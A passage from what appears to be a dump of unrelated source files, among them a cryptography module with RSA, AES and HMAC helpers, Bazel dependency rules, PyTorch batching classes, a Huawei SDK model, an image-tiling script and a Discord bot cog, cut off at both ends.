exceptions.UnsupportedAlgorithm) as e:\n raise type_info.TypeValueError(\"Public key invalid: %s\" % e)\n\n def ParseFromDatastore(self, value):\n precondition.AssertType(value, bytes)\n self.ParseFromString(value)\n\n def ParseFromHumanReadable(self, string):\n precondition.AssertType(string, Text)\n self.ParseFromString(string.encode(\"ascii\"))\n\n def SerializeToString(self):\n if self._value is None:\n return \"\"\n return self._value.public_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo)\n\n def GetN(self):\n return self._value.public_numbers().n\n\n def __str__(self):\n return self.SerializeToString()\n\n def AsPEM(self):\n return self.SerializeToString()\n\n def KeyLen(self):\n if self._value is None:\n return 0\n return self._value.key_size\n\n def Encrypt(self, message):\n if self._value is None:\n raise ValueError(\"Can't Encrypt with empty key.\")\n\n try:\n return self._value.encrypt(\n message,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=None))\n except ValueError as e:\n raise CipherError(e)\n\n def Verify(self, message, signature, hash_algorithm=None):\n \"\"\"Verifies a given message.\"\"\"\n # This method accepts both PSS and PKCS1v15 padding. 
PSS is preferred but\n # old clients only support PKCS1v15.\n\n if hash_algorithm is None:\n hash_algorithm = hashes.SHA256()\n\n last_e = None\n for padding_algorithm in [\n padding.PSS(\n mgf=padding.MGF1(hash_algorithm),\n salt_length=padding.PSS.MAX_LENGTH),\n padding.PKCS1v15()\n ]:\n try:\n self._value.verify(signature, message, padding_algorithm,\n hash_algorithm)\n return True\n\n except exceptions.InvalidSignature as e:\n last_e = e\n\n raise VerificationError(last_e)\n\n\nclass RSAPrivateKey(rdfvalue.RDFPrimitive):\n \"\"\"An RSA private key.\"\"\"\n\n def __init__(self, initializer=None, age=None, allow_prompt=None):\n self.allow_prompt = allow_prompt\n super(RSAPrivateKey, self).__init__(initializer=initializer, age=age)\n if self._value is None and initializer is not None:\n if isinstance(initializer, rsa.RSAPrivateKey):\n self._value = initializer\n elif isinstance(initializer, bytes):\n self.ParseFromString(initializer)\n elif isinstance(initializer, Text):\n self.ParseFromString(initializer.encode(\"ascii\"))\n else:\n raise rdfvalue.InitializeError(\n \"Cannot initialize %s from %s.\" % (self.__class__, initializer))\n\n def ParseFromHumanReadable(self, string):\n precondition.AssertType(string, Text)\n self.ParseFromString(string.encode(\"ascii\"))\n\n def GetRawPrivateKey(self):\n return self._value\n\n def GetPublicKey(self):\n return RSAPublicKey(self._value.public_key())\n\n def Sign(self, message, use_pss=False):\n \"\"\"Sign a given message.\"\"\"\n precondition.AssertType(message, bytes)\n\n # TODO(amoser): This should use PSS by default at some point.\n if not use_pss:\n padding_algorithm = padding.PKCS1v15()\n else:\n padding_algorithm = padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH)\n\n return self._value.sign(message, padding_algorithm, hashes.SHA256())\n\n def Decrypt(self, message):\n if self._value is None:\n raise ValueError(\"Can't Decrypt with empty key.\")\n\n try:\n return self._value.decrypt(\n message,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=None))\n except ValueError as e:\n raise CipherError(e)\n\n @classmethod\n def GenerateKey(cls, bits=2048, exponent=65537):\n key = rsa.generate_private_key(\n public_exponent=exponent, key_size=bits, backend=openssl.backend)\n return cls(key)\n\n def ParseFromString(self, pem_string):\n precondition.AssertType(pem_string, bytes)\n try:\n self._value = serialization.load_pem_private_key(\n pem_string, password=None, backend=openssl.backend)\n return\n except (TypeError, ValueError, exceptions.UnsupportedAlgorithm) as e:\n\n if \"private key is encrypted\" not in str(e):\n raise type_info.TypeValueError(\"Private key invalid: %s\" % e)\n\n # pylint: disable=g-explicit-bool-comparison, g-equals-none\n\n # The private key is passphrase protected, we need to see if we are\n # allowed to ask the user.\n #\n # If allow_prompt is False, we are explicitly told that we are not.\n if self.allow_prompt == False:\n raise type_info.TypeValueError(\"Private key invalid: %s\" % e)\n\n # allow_prompt was not set, we use the context we are in to see if it\n # makes sense to ask.\n elif self.allow_prompt == None:\n # TODO(user): dependency loop with\n # core/grr_response_core/grr/config/client.py.\n # pylint: disable=protected-access\n if \"Commandline Context\" not in config_lib._CONFIG.context:\n raise type_info.TypeValueError(\"Private key invalid: %s\" % e)\n # pylint: enable=protected-access\n\n # pylint: 
enable=g-explicit-bool-comparison, g-equals-none\n\n try:\n # The private key is encrypted and we can ask the user for the passphrase.\n password = utils.PassphraseCallback()\n self._value = serialization.load_pem_private_key(\n pem_string, password=password, backend=openssl.backend)\n except (TypeError, ValueError, exceptions.UnsupportedAlgorithm) as e:\n raise type_info.TypeValueError(\"Unable to load private key: %s\" % e)\n\n def ParseFromDatastore(self, value):\n precondition.AssertType(value, bytes)\n self.ParseFromString(value)\n\n def SerializeToString(self):\n if self._value is None:\n return \"\"\n return self._value.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.TraditionalOpenSSL,\n encryption_algorithm=serialization.NoEncryption())\n\n def __str__(self):\n digest = hashlib.sha256(self.AsPEM()).hexdigest()\n return \"%s (%s)\" % (self.__class__.__name__, digest)\n\n def AsPEM(self):\n return self.SerializeToString()\n\n def AsPassphraseProtectedPEM(self, passphrase):\n if self._value is None:\n return \"\"\n return self._value.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.TraditionalOpenSSL,\n encryption_algorithm=serialization.BestAvailableEncryption(passphrase))\n\n def KeyLen(self):\n if self._value is None:\n return 0\n return self._value.key_size\n\n\n# TODO(amoser): Get rid of those.\n# Conserve old names for backwards compatibility.\nclass PEMPrivateKey(RSAPrivateKey):\n pass\n\n\nclass PEMPublicKey(RSAPublicKey):\n pass\n\n\nclass Hash(rdf_structs.RDFProtoStruct):\n \"\"\"A hash object containing multiple digests.\"\"\"\n protobuf = jobs_pb2.Hash\n rdf_deps = [\n rdf_standard.AuthenticodeSignedData,\n rdfvalue.HashDigest,\n ]\n\n\nclass SignedBlob(rdf_structs.RDFProtoStruct):\n \"\"\"A signed blob.\n\n The client can receive and verify a signed blob (e.g. driver or executable\n binary). Once verified, the client may execute this.\n \"\"\"\n protobuf = jobs_pb2.SignedBlob\n\n def Verify(self, public_key):\n \"\"\"Verify the data in this blob.\n\n Args:\n public_key: The public key to use for verification.\n\n Returns:\n True when verification succeeds.\n\n Raises:\n rdfvalue.DecodeError if the data is not suitable verified.\n \"\"\"\n if self.digest_type != self.HashType.SHA256:\n raise rdfvalue.DecodeError(\"Unsupported digest.\")\n if self.signature_type not in [\n self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS\n ]:\n raise rdfvalue.DecodeError(\"Unsupported signature type.\")\n\n try:\n public_key.Verify(self.data, self.signature)\n except InvalidSignature as e:\n raise rdfvalue.DecodeError(\"Could not verify blob. Error: %s\" % e)\n\n return True\n\n def Sign(self, data, signing_key, verify_key=None):\n \"\"\"Use the data to sign this blob.\n\n Args:\n data: String containing the blob data.\n signing_key: The key to sign with.\n verify_key: Key to verify with. 
If None we assume the signing key also\n contains the public key.\n\n Returns:\n self for call chaining.\n \"\"\"\n\n if signing_key.KeyLen() < 2048:\n logging.warning(\"signing key is too short.\")\n\n self.signature = signing_key.Sign(data)\n self.signature_type = self.SignatureType.RSA_PKCS1v15\n\n self.digest = hashlib.sha256(data).digest()\n self.digest_type = self.HashType.SHA256\n self.data = data\n\n # Test we can verify before we send it off.\n if verify_key is None:\n verify_key = signing_key.GetPublicKey()\n\n # Verify our own data.\n self.Verify(verify_key)\n\n return self\n\n\nclass EncryptionKey(rdfvalue.RDFBytes):\n \"\"\"Base class for encryption keys.\"\"\"\n\n # Size of the key in bits.\n length = 0\n\n def ParseFromString(self, string):\n\n if len(string) % 8:\n raise CipherError(\n \"Invalid key length %d (%s).\" % (len(string) * 8, string))\n\n self._value = string\n self.length = 8 * len(self._value)\n\n if self.length < 128:\n raise CipherError(\"Key too short (%d): %s\" % (self.length, string))\n\n def __str__(self):\n digest = hashlib.sha256(self.AsHexDigest()).hexdigest()\n return \"%s (%s)\" % (self.__class__.__name__, digest)\n\n def AsHexDigest(self):\n return binascii.hexlify(self._value)\n\n @classmethod\n def FromHex(cls, hex_string):\n precondition.AssertType(hex_string, Text)\n return cls(binascii.unhexlify(hex_string))\n\n def SerializeToString(self):\n return self._value\n\n @classmethod\n def GenerateKey(cls, length=128):\n return cls(os.urandom(length // 8))\n\n @classmethod\n def GenerateRandomIV(cls, length=128):\n return cls.GenerateKey(length=length)\n\n def RawBytes(self):\n return self._value\n\n\n# TODO(amoser): Size is now flexible, this class makes no sense anymore.\nclass AES128Key(EncryptionKey):\n length = 128\n\n\nclass AutoGeneratedAES128Key(AES128Key):\n \"\"\"Like AES128Key, but its UI edit box is prefilled with generated key.\"\"\"\n\n def __init__(self, initializer=None, **kwargs):\n if isinstance(initializer, AES128Key):\n super(AutoGeneratedAES128Key, self).__init__(\n initializer=initializer.RawBytes(), **kwargs)\n else:\n super(AutoGeneratedAES128Key, self).__init__(\n initializer=initializer, **kwargs)\n\n\nclass StreamingCBCEncryptor(object):\n \"\"\"A class to stream data to a CBCCipher object.\"\"\"\n\n def __init__(self, cipher):\n self._cipher = cipher\n self._encryptor = cipher.GetEncryptor()\n self._overflow_buffer = b\"\"\n self._block_size = len(cipher.key)\n\n def Update(self, data):\n data = self._overflow_buffer + data\n overflow_count = len(data) % self._block_size\n length_to_encrypt = len(data) - overflow_count\n to_encrypt = data[:length_to_encrypt]\n self._overflow_buffer = data[length_to_encrypt:]\n return self._encryptor.update(to_encrypt)\n\n def Finalize(self):\n res = self._encryptor.update(self._cipher.Pad(self._overflow_buffer))\n res += self._encryptor.finalize()\n return res\n\n\nclass AES128CBCCipher(object):\n \"\"\"A Cipher using AES128 in CBC mode and PKCS7 for padding.\"\"\"\n\n algorithm = None\n\n def __init__(self, key, iv):\n \"\"\"Init.\n\n Args:\n key: The key, a rdf_crypto.EncryptionKey instance.\n iv: The iv, a rdf_crypto.EncryptionKey instance.\n \"\"\"\n self.key = key.RawBytes()\n self.iv = iv.RawBytes()\n\n def Pad(self, data):\n padder = sym_padding.PKCS7(128).padder()\n return padder.update(data) + padder.finalize()\n\n def UnPad(self, padded_data):\n unpadder = sym_padding.PKCS7(128).unpadder()\n return unpadder.update(padded_data) + unpadder.finalize()\n\n def GetEncryptor(self):\n 
return ciphers.Cipher(\n algorithms.AES(self.key), modes.CBC(self.iv),\n backend=openssl.backend).encryptor()\n\n def Encrypt(self, data):\n \"\"\"A convenience method which pads and encrypts at once.\"\"\"\n encryptor = self.GetEncryptor()\n padded_data = self.Pad(data)\n\n try:\n return encryptor.update(padded_data) + encryptor.finalize()\n except ValueError as e:\n raise CipherError(e)\n\n def GetDecryptor(self):\n return ciphers.Cipher(\n algorithms.AES(self.key), modes.CBC(self.iv),\n backend=openssl.backend).decryptor()\n\n def Decrypt(self, data):\n \"\"\"A convenience method which pads and decrypts at once.\"\"\"\n decryptor = self.GetDecryptor()\n\n try:\n padded_data = decryptor.update(data) + decryptor.finalize()\n return self.UnPad(padded_data)\n except ValueError as e:\n raise CipherError(e)\n\n\nclass SymmetricCipher(rdf_structs.RDFProtoStruct):\n \"\"\"Abstract symmetric cipher operations.\"\"\"\n protobuf = jobs_pb2.SymmetricCipher\n rdf_deps = [\n EncryptionKey,\n ]\n\n @classmethod\n def Generate(cls, algorithm):\n if algorithm != cls.Algorithm.AES128CBC:\n raise RuntimeError(\"Algorithm not supported.\")\n\n return cls(\n _algorithm=algorithm,\n _key=EncryptionKey.GenerateKey(length=128),\n _iv=EncryptionKey.GenerateKey(length=128))\n\n def _get_cipher(self):\n if self._algorithm != self.Algorithm.AES128CBC:\n raise CipherError(\"Unknown cipher type %s\" % self._algorithm)\n\n return AES128CBCCipher(self._key, self._iv)\n\n def Encrypt(self, data):\n if self._algorithm == self.Algorithm.NONE:\n raise TypeError(\"Empty encryption is not allowed.\")\n\n return self._get_cipher().Encrypt(data)\n\n def Decrypt(self, data):\n if self._algorithm == self.Algorithm.NONE:\n raise TypeError(\"Empty encryption is not allowed.\")\n\n return self._get_cipher().Decrypt(data)\n\n\nclass HMAC(object):\n \"\"\"A wrapper for the cryptography HMAC object.\"\"\"\n\n def __init__(self, key, use_sha256=False):\n # We store the raw key from cryptography.io.\n if isinstance(key, EncryptionKey):\n key = key.RawBytes()\n\n self.key = key\n self._hmac = self._NewHMAC(use_sha256=use_sha256)\n\n def _NewHMAC(self, use_sha256=False):\n if use_sha256:\n hash_algorithm = hashes.SHA256()\n else:\n hash_algorithm = hashes.SHA1()\n return hmac.HMAC(self.key, hash_algorithm, backend=openssl.backend)\n\n def Update(self, data):\n self._hmac.update(data)\n\n def Finalize(self):\n return self._hmac.finalize()\n\n def HMAC(self, message, use_sha256=False):\n \"\"\"Calculates the HMAC for a given message.\"\"\"\n h = self._NewHMAC(use_sha256=use_sha256)\n h.update(message)\n return h.finalize()\n\n def Verify(self, message, signature):\n \"\"\"Verifies the signature for a given message.\"\"\"\n siglen = len(signature)\n if siglen == 20:\n hash_algorithm = hashes.SHA1()\n elif siglen == 32:\n hash_algorithm = hashes.SHA256()\n else:\n raise VerificationError(\"Invalid signature length %d.\" % siglen)\n\n h = hmac.HMAC(self.key, hash_algorithm, backend=openssl.backend)\n h.update(message)\n try:\n h.verify(signature)\n return True\n except exceptions.InvalidSignature as e:\n raise VerificationError(e)\n\n\nclass Password(rdf_structs.RDFProtoStruct):\n \"\"\"A password stored in the database.\"\"\"\n protobuf = jobs_pb2.Password\n\n def _CalculateHash(self, password, salt, iteration_count):\n kdf = pbkdf2.PBKDF2HMAC(\n algorithm=hashes.SHA256(),\n length=32,\n salt=salt,\n iterations=iteration_count,\n backend=openssl.backend)\n return kdf.derive(password)\n\n def SetPassword(self, password):\n self.salt = 
b\"%016x\" % random.UInt64()\n self.iteration_count = 100000\n\n # prevent non-descriptive 'key_material must be bytes' error later\n if isinstance(password, string_types):\n password = password.encode(\"utf-8\")\n\n self.hashed_pwd = self._CalculateHash(password, self.salt,\n self.iteration_count)\n\n def CheckPassword(self, password):\n # prevent non-descriptive 'key_material must be bytes' error later\n if isinstance(password, string_types):\n password = password.encode(\"utf-8\")\n\n h = self._CalculateHash(password, self.salt, self.iteration_count)\n return constant_time.bytes_eq(h, self.hashed_pwd)\n"} {"ext": "bzl", "sha": "1a2fd22700cafa76f737a3dd29aba393dd1c839e", "content": "# Copyright 2019 Google LLC\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of Google LLC nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nload(\"@bazel_tools//tools/build_defs/repo:git.bzl\", \"git_repository\")\nload(\"@bazel_tools//tools/build_defs/repo:http.bzl\", \"http_archive\")\nload(\"@com_google_api_gax_java_properties//:dependencies.properties.bzl\", \"PROPERTIES\")\n\ndef com_google_api_gax_java_repositories():\n # Import dependencies shared between Gradle and Bazel (i.e. maven dependencies)\n for name, artifact in PROPERTIES.items():\n _maybe(\n native.maven_jar,\n name = name,\n strip_repo_prefix = \"maven.\",\n artifact = _fix_bazel_artifact_format(artifact),\n )\n\n # Import Bazel-only dependencies (Gradle version will import maven artifacts of same\n # version, while Bazel will depend on Bazel workspaces). 
The versions are shared in the\n # properties file.\n\n _protobuf_version = PROPERTIES[\"version.com_google_protobuf\"]\n _protobuf_version_in_link = \"v%s\" % _protobuf_version\n _maybe(\n http_archive,\n name = \"com_google_protobuf\",\n urls = [\"https://github.com/protocolbuffers/protobuf/archive/%s.zip\" % _protobuf_version_in_link],\n strip_prefix = \"protobuf-%s\" % _protobuf_version,\n )\n\n _grpc_version = PROPERTIES[\"version.io_grpc\"]\n _grpc_version_in_link = \"v%s\" % _grpc_version\n _maybe(\n http_archive,\n name = \"io_grpc_grpc_java\",\n urls = [\"https://github.com/grpc/grpc-java/archive/%s.zip\" % _grpc_version_in_link],\n strip_prefix = \"grpc-java-%s\" % _grpc_version,\n )\n\n _maybe(\n http_archive,\n name = \"bazel_skylib\",\n strip_prefix = \"bazel-skylib-0.7.0\",\n urls = [\"https://github.com/bazelbuild/bazel-skylib/archive/0.7.0.zip\"],\n )\n\n _maybe(\n native.maven_jar,\n name = \"io_grpc_grpc_netty_shaded\",\n artifact = \"io.grpc:grpc-netty-shaded:%s\" % PROPERTIES[\"version.io_grpc\"],\n )\n\n _maybe(\n native.maven_jar,\n name = \"google_java_format_all_deps\",\n artifact = \"com.google.googlejavaformat:google-java-format:jar:all-deps:%s\" % PROPERTIES[\"version.google_java_format\"],\n )\n\n _maybe(\n native.bind,\n name = \"guava\",\n actual = \"@com_google_guava_guava//jar\",\n )\n\n _maybe(\n native.bind,\n name = \"gson\",\n actual = \"@com_google_code_gson_gson//jar\",\n )\n\n _maybe(\n native.bind,\n name = \"error_prone_annotations\",\n actual = \"@com_google_errorprone_error_prone_annotations//jar\",\n )\n\ndef _maybe(repo_rule, name, strip_repo_prefix = \"\", **kwargs):\n if not name.startswith(strip_repo_prefix):\n return\n repo_name = name[len(strip_repo_prefix):]\n if repo_name in native.existing_rules():\n return\n repo_rule(name = repo_name, **kwargs)\n\ndef _fix_bazel_artifact_format(artifact_id):\n # Fix the artifact id format discrepancy between Bazel & Gradle.\n # This is relevant only when classifier is specified explicitly.\n # Bazel format: groupId:artifactId:jar:classifier:version\n # Gradle format: groupId:artifactId:version:classifier\n ids = artifact_id.split(\":\")\n if len(ids) != 4:\n return artifact_id\n return \"%s:%s:%s:%s:%s\" % (ids[0], ids[1], \"jar\", ids[3], ids[2])\n"} {"ext": "py", "sha": "1a2fd23a0e2f3b5198b6e8ac5f62026fc8f32429", "content": "from torch.autograd import Variable\nfrom Model import Decoder\nimport torchsnooper\n\n\n# Batches and Masking\nclass Batch:\n \"此对象用于在训练时进行已屏蔽的批数据处理\"\n\n def __init__(self, src, trg=None, pad=0):\n self.src = src\n self.src_mask = (src != pad).unsqueeze(-2)\n if trg is not None:\n self.trg = trg[:, :-1]\n self.trg_y = trg[:, 1:]\n self.trg_mask = \\\n self.make_std_mask(self.trg, pad)\n self.ntokens = (self.trg_y != pad).data.sum()\n\n @staticmethod\n def make_std_mask(tgt, pad):\n \"创建一个mask来隐藏填充和将来的单词\"\n tgt_mask = (tgt != pad).unsqueeze(-2)\n tgt_mask = tgt_mask & Variable(\n subsequent_mask(tgt.size(-1)).type_as(tgt_mask.data))\n return tgt_mask\n\n\n# 我们将使用torch 文本进行批处理。在TorchText函数中创建批次,确保填充最大批次大小不超过阈值(如果我们有8个GPU,则为25000)。\nglobal max_src_in_batch, max_tgt_in_batch\n\n\ndef batch_size_fn(new, count, sofar):\n \"持续扩大批处理并计算标识+填充的总数\"\n global max_src_in_batch, max_tgt_in_batch\n if count == 1:\n max_src_in_batch = 0\n max_tgt_in_batch = 0\n max_src_in_batch = max(max_src_in_batch, len(new.src))\n max_tgt_in_batch = max(max_tgt_in_batch, len(new.src) + 2)\n src_elements = count * max_src_in_batch\n tgt_elements = count * max_tgt_in_batch\n return max(src_elements, 
tgt_elements)\n\n\nclass Batch_kg:\n \"此对象用于在训练时进行已屏蔽的批数据处理\"\n\n def __init__(self, src, ent, trg=None, pad=0):\n self.src = src\n self.ent = ent\n self.trg = trg\n self.src_mask = (src != pad).unsqueeze(-2)\n self.ent_mask = None\n if self.trg is not None:\n self.trg = trg[:, :-1]\n self.trg_y = trg[:, 1:]\n self.trg_mask = \\\n self.make_std_mask(self.trg, pad)\n self.ntokens = (self.trg_y != pad).data.sum()\n\n @staticmethod\n def make_std_mask(tgt, pad):\n \"创建一个mask来隐藏填充和将来的单词\"\n tgt_mask = (tgt != pad).unsqueeze(-2)\n tgt_mask = tgt_mask & Variable(\n Decoder.subsequent_mask(tgt.size(-1)).type_as(tgt_mask.data))\n return tgt_mask\n\nclass Batch_ast:\n \"此对象用于在训练时进行已屏蔽的批数据处理\"\n\n def __init__(self, src, ent, ast, trg=None, pad=0):\n self.src = src\n self.ent = ent\n self.trg = trg\n self.ast = ast\n self.src_mask = (src != pad).unsqueeze(-2)\n self.ent_mask = None\n self.ast_mask = (src != pad).unsqueeze(-2)\n if self.trg is not None:\n self.trg = trg[:, :-1]\n self.trg_y = trg[:, 1:]\n self.trg_mask = \\\n self.make_std_mask(self.trg, pad)\n self.ntokens = (self.trg_y != pad).data.sum()\n\n @staticmethod\n def make_std_mask(tgt, pad):\n \"创建一个mask来隐藏填充和将来的单词\"\n tgt_mask = (tgt != pad).unsqueeze(-2)\n tgt_mask = tgt_mask & Variable(\n Decoder.subsequent_mask(tgt.size(-1)).type_as(tgt_mask.data))\n return tgt_mask"} {"ext": "py", "sha": "1a2fd2a6564dbb3f0de3e5aea345a7e5ec29fa0a", "content": "#coding=utf-8\n\nHOST = ''\nPORT = 50008\n\n# maximum sleep time while there is no connect for a smv process\nMAX_SLEEP_TIME = 5\n\n# time out in seconds\nTIME_OUT = 5\nMU_CHECK_TIMEOUT = 600\nMU_CHECK_MEMORY = 1024\n\n# path to NuSMV\nSMV_PATH = '/home/lyj238/Downloads/NuSMV/bin/NuSMV'\nMU_PATH = '/home/lyj238/Downloads/cmurphi5.4.9/src/mu'\nMU_INCLUDE = '/home/lyj238/Downloads/cmurphi5.4.9/include'\nGXX_PATH = '/usr/bin/g++'\n\n# path for storing smv files\nSMV_FILE_DIR = '/tmp/NuSMV/'\nMU_FILE_DIR = '/tmp/cmurphi/'\n\n\n\n\n\ndirs = [SMV_FILE_DIR, MU_FILE_DIR]\n\nimport os\n\nfor d in dirs:\n if not os.path.isdir(d):\n os.makedirs(d)\n"} {"ext": "py", "sha": "1a2fd3343a3364a08960b27e84d5f7c4cfcef834", "content": "# coding: utf-8\n\nimport re\nimport six\n\n\n\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass ImportJobRequest:\n\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n\n sensitive_list = []\n\n openapi_types = {\n 'body': 'ImportFileReq'\n }\n\n attribute_map = {\n 'body': 'body'\n }\n\n def __init__(self, body=None):\n \"\"\"ImportJobRequest - a model defined in huaweicloud sdk\"\"\"\n \n \n\n self._body = None\n self.discriminator = None\n\n if body is not None:\n self.body = body\n\n @property\n def body(self):\n \"\"\"Gets the body of this ImportJobRequest.\n\n\n :return: The body of this ImportJobRequest.\n :rtype: ImportFileReq\n \"\"\"\n return self._body\n\n @body.setter\n def body(self, body):\n \"\"\"Sets the body of this ImportJobRequest.\n\n\n :param body: The body of this ImportJobRequest.\n :type: ImportFileReq\n \"\"\"\n self._body = body\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, 
\"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ImportJobRequest):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n"} {"ext": "py", "sha": "1a2fd3acdd0c8c8e703a6777cb4c6c209d8f9c7f", "content": "import cv2\r\nimport os\r\nimport numpy as np\r\nimport random\r\n\r\n# 例子为:在NEU-CLS数据集上操作的。\r\n# 在合成后数据集中随机选取若干张数据作为新的数据集。\r\n\r\nimage_dir = '/content/drive/MyDrive/colab/multiClass/NEU-CLS'\r\n\r\n# 打乱原始数据集顺序\r\nimg_path = []\r\nfor name in os.listdir(image_dir):\r\n img_path.append(os.path.join(image_dir, name))\r\n\r\nrandom.shuffle(img_path)\r\nnew_types = ['PS', 'RS', 'Cr', 'In', 'Pa', 'Sc']\r\n\r\n\r\n# 处理type\r\ndef str_to_defect_types(s):\r\n defect_types = []\r\n for t in new_types:\r\n defect_types.append(s.count(t))\r\n\r\n return defect_types\r\n\r\n\r\ns = []\r\ny = []\r\ndataset_list = img_path # 训练或测试需要修改 列表 训练:train_dataset; 测试:test_dataset\r\n# size_4_1 = int(len(dataset_list)/4) # 合成图像个数new_dataset_path\r\n# randvector = list(range(len(dataset_list)))\r\nrandvector = list(range(1000)) # 3400 2800 1440\r\n\r\nfor i in randvector:\r\n # img2 = dataset_list[i]\r\n img2 = random.choice(dataset_list) # 路径\r\n imgx = img2.split(\"/\")[-1].split(\"_\")[0] # 类别\r\n s.append(imgx)\r\n y.append(img2)\r\n\r\n\r\ndef to_matrix(x_y, n):\r\n ls_4 = []\r\n for i in range(0, len(x_y), n):\r\n ls_4.append(x_y[i: i + n])\r\n return ls_4\r\n\r\n\r\ns = to_matrix(s, 4)\r\ny = to_matrix(y, 4)\r\n\r\n# 合成图片 4 -> 1\r\nimg_data = []\r\nimg_type = []\r\nnum = 0\r\nfor i in range(250):\r\n x1 = cv2.imread(y[i][0]) # ,as_gray=True)\r\n x2 = cv2.imread(y[i][1]) # ,as_gray=True)\r\n x3 = cv2.imread(y[i][2]) # ,as_gray=True)\r\n x4 = cv2.imread(y[i][3]) # ,as_gray=True)\r\n im_h1 = cv2.hconcat([x1, x2]) # 合并函数\r\n im_h2 = cv2.hconcat([x3, x4])\r\n im_f = cv2.vconcat([im_h1, im_h2])\r\n img_data.append(np.array(im_f))\r\n img_type.append(str_to_defect_types(s[i])) # 处理type\r\n\r\nroot_path = '/content/drive/MyDrive/colab/multiClass/Defects' # 保存至此文件夹下\r\n# 类型转换\r\nimg_data_np = np.array(img_data)\r\nimg_type_np = np.array(img_type)\r\n\r\n# 合成保存文件绝对路径\r\nimg_data_file = os.path.join(root_path, 'data文件名.npy')\r\nimg_types = os.path.join(root_path, 'type文件名.npy')\r\n# 保存\r\nnp.save(img_data_file, img_data_np)\r\nnp.save(img_types, img_type_np)\r\n"} {"ext": "py", "sha": "1a2fd3c90aadf9f684f07ba1d0ba1cea7b840d49", "content": "import discord\nimport random\nimport asyncio\nimport discord\nfrom discord.ext import commands, tasks\n\nclass Prescence(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n self.prescence_default.start()\n self.ctfu_rgblighting.start()\n\n def cog_unload(self):\n self.prescence_default.cancel()\n\n @tasks.loop(seconds=60.0)\n async def 
prescence_default(self):\n \tawait self.bot.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=f'{len(self.bot.users)} users.'))\n\n @tasks.loop(seconds=600.0)\n async def ctfu_rgblighting(self):\n \tctfuserver = self.bot.get_guild(694217343173394432)\n \trole = ctfuserver.get_role(701007133994647622)\n \tawait role.edit(colour=discord.Colour(random.randint(0, 0xFFFFFF)))\n\n @prescence_default.before_loop\n async def before_running(self):\n print('Bot setting up... Adding presence...')\n await self.bot.wait_until_ready()\n\n @ctfu_rgblighting.before_loop\n async def before_running(self):\n print('Bot setting up... Adding RGB Lighting for CTFU...')\n await self.bot.wait_until_ready()\n\ndef setup(bot):\n\tbot.add_cog(Prescence(bot))\n"} {"ext": "py", "sha": "1a2fd42c4c82234852097562aea1f7ebd15fb317", "content": "import random\nimport string\nfrom time import time\nfrom settings import URL, CHATS_COLLECTION_NAME\nfrom .base import CommandBase\n\n\nclass CommandStart(CommandBase):\n\n async def __call__(self, payload):\n\n self.set_bot(payload)\n\n registered_chat = self.sdk.db.find_one(CHATS_COLLECTION_NAME, {'chat': payload['chat'], 'bot': self.bot})\n\n if registered_chat:\n user_token = registered_chat['user']\n else:\n user_token = self.generate_user_token()\n new_chat = {\n 'chat': payload['chat'],\n 'user': user_token,\n 'dt_register': time(),\n 